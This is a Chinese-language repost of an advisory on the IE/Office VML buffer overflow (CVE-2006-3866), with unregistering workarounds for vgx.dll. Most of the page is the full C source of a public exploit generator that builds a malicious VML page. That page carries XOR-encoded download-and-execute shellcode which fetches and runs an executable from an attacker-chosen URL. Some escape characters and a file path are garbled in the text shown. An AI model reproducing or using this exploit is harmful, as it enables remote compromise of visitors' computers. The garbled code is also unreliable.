同时影响IE和Office的畸形VML文档处理缓冲区溢出漏洞

微软的安全顾问昨日找出了一个Windows矢量图形渲染库的漏洞并得到确认,这可导致缓冲区溢出,这个漏洞的影响范围涵盖IE所有版本和Office包括最新的2007版本.目前攻击代码已经出现,补丁还没出,解决方案已经有,提请各位小心.

BUGTRAQ ID: 20096
CVE(CAN) ID: CVE-2006-3866

Internet Explorer是微软发布的非常流行的WEB浏览器.

Internet Explorer在处理畸形VML文档时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令.

Microsoft的矢量图形渲染库(vgx.dll)的_IE5_SHADETYPE_TEXT::Text过程在处理矢量标记语言(VML)文档中的某些内容时存在栈溢出漏洞.如果用户受骗使用IE浏览器浏览了“rect”标签中包含有超长“fill”方式的恶意VML文档的话,就会触发这个溢出,导致执行任意指令.目前这个漏洞正在被积极的利用.

临时解决方法:

* 解除vgx.dll的注册
点击“开始”菜单,选择“运行”,在其中输入下面的命令:
regsvr32 -u "%ProgramFiles%/Common Files/Microsoft Shared/VGXvgx.dll"
然后点击“确定”,在随后出现的弹出窗口中点击“确定”按钮.
在微软发布补丁后,如果想恢复注册,只需再用上述方法运行下面的命令即可:
regsvr32 "%ProgramFiles%/Common Files/Microsoft Shared/VGXvgx.dll"
* 修改访问控制列表,限制用户对vgx.dll访问
* 配置Microsoft Windows XP SP2上的IE6在Internet和本地Intranet安全区中禁用“二进制和脚本行为”
* 以纯文本方式读取邮件消息

查看:Microsoft IE畸形VML文档处理缓冲区溢出漏洞(包含测试代码)

攻击代码:

/*
*-----------------------------------------------------------------------
*
* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author   : nop
*          : nop#xsec.org
*          : http://www.xsec.org [www.xsec.org]
*          :
* Tested   : Windows 2000 Server CN
*          :  + Internet Explorer 6.0 SP1
*          :
* Complie  : cl vml.c
*          :
* Usage    : d:>vml
*          :
*          : Usage: vml <URL> [htmlfile]
*          :
*          : d:>vml http://xsec.org/xxx.exe [xsec.org] xxx.htm
*          :
*
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

#define NOPSIZE 260
#define MAXURL  60

//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD;   // call esp for All win2k
//7800CCDD

// Search Shellcode
unsigned char dc[] =
"x8BxDCxBEx6Fx6Fx6Fx70x4ExBFx6Fx30x30x70x4Fx43x39"
"x3Bx75xFBx4Bx80x33xEEx39x73xFCx75xF7xFFxD3";

// Shellcode Start
unsigned char dcstart[] =
"noop";

// Download Exec Shellcode XOR with 0xee
unsigned char sc[] =
"x07x4BxEExEExEExB1x8Ax4FxDExEExEExEEx65xAExE2x65"
"x9ExF2x43x65x86xE6x65x19x84xEAxB7x06xABxEExEExEE"
"x0Cx17x86x81x80xEExEEx86x9Bx9Cx82x83xBAx11xF8x7B"
"x06xDExEExEExEEx6Dx02xCEx65x32x84xCExBDx11xB8xEA"
"x29xEAxEDxB2x8FxC0x8Bx29xAAxEDxEAx96x8BxEExEExDD"
"x2ExBExBExBDxB9xBEx11xB8xFEx65x32xBExBDx11xB8xE6"
"x84xEFx11xB8xE2xBFxB8x65x9BxD2x65x9AxC0x96xEDx1B"
"xB8x65x98xCExEDx1BxDDx27xA7xAFx43xEDx2BxDDx35xE1"
"x50xFExD4x38x9AxE6x2Fx25xE3xEDx34xAEx05x1FxD5xF1"
"x9Bx09xB0x65xB0xCAxEDx33x88x65xE2xA5x65xB0xF2xED"
"x33x65xEAx65xEDx2Bx45xB0xB7x2Dx06xB8x11x11x11x60"
"xA0xE0x02x2Fx97x0Bx56x76x10x64xE0x90x36x0Cx9DxD8"
"xF4xC1x9E";

// Shellcode End
unsigned char dcend[] =
"n00p";

// HTML Header
char * header =
"<html xmlns:v="urn:schemas-microsoft-com:vml">n"
"<head>n"
"<title>XSec.org</title>n"
"<style>n"
"v:* { behavior: url(#default#VML); }n"
"</style>n"
"</head>n"
"<body>n"
"<v:rect style="width:20pt;height:20pt" fillcolor="red">n"
"<v:fill method="";

char * footer =
""/>n"
"</v:rect>n"
"</body>n"
"</html>n"
;

// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
{
int i=0;
unsigned int ncr = 0;

for(i=0; i<size; i+=2)
{
    ncr = (buf[i+1] << 8) + buf[i];

    fprintf(fp, "&#%d;", ncr);
}
}

void main(int argc, char **argv)
{
    unsigned char buf[1024] = {0};
    unsigned char burl[255] = {0};
    int sc_len = 0;
    int psize = 0;
    int i = 0;

    unsigned int nop = 0x4141;
    DWORD jmp = 0xeb06eb06;

    if (argc < 2)
    {
       printf("Windows VML Download Exec Exploitn");
       printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.orgn");
       //printf("!!! 0Day !!! Please Keep Private!!!n");
        printf("rnUsage: %s <URL> [htmlfile]rnn", argv[0]);
        exit(1);
    }

    url = argv[1];
    if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > MAXURL)
    {
     printf("[-] Invalid url. Must start with ’http://’,’ftp://’ and < %d bytes.n", MAXURL);
     return;
    }

   printf("[+] download url:%sn", url);

   if(argc >=3) file = argv[2];

   printf("[+] exploit file:%sn", file);

    fp = fopen(file, "w+b");
    //fp = fopen(file, "w");
    if(!fp)
    {
     printf("[-] Open file error!n");
     return;
    }

    // print html header
    fprintf(fp, "%s", header);
    fflush(fp);

    for(i=0; i<NOPSIZE; i++)
    {
       //fprintf(fp, "&#%d;", nop);
       fprintf(fp, "A");
    }

    fflush(fp);

    // print shellcode
    memset(buf, 0x90, sizeof(buf));
    //memset(buf, 0x90, NOPSIZE*2);

    memcpy(buf, &ret, 4);
    psize = 4+8+0x10;

    memcpy(buf+psize, dc, sizeof(dc)-1);
    psize += sizeof(dc)-1;

    memcpy(buf+psize, dcstart, 4);
    psize += 4;

    sc_len = sizeof(sc)-1;
    memcpy(buf+psize, sc, sc_len);
    psize += sc_len;


    // print URL
    memset(burl, 0, sizeof(burl));
    strncpy(burl, url, 60);

    for(i=0; i<strlen(url)+1; i++)
    {
       burl[i] = buf[i] ^ 0xee;
    }

    memcpy(buf+psize, burl, strlen(url)+1);
    psize += strlen(url)+1;

    memcpy(buf+psize, dcend, 4);
    psize += 4;

    // print NCR
    convert2ncr(buf, psize);



    printf("[+] buff size %d bytesn", psize);

    // print html footer
    fprintf(fp, "%s", footer);
    fflush(fp);

    printf("[+] exploit write to %s success!n", file);
}


	放飞你的梦想－－翱翔我的天空		设为首页 \| 会员登陆 \| 繁體中文 \| 站点地图 \| 站长博客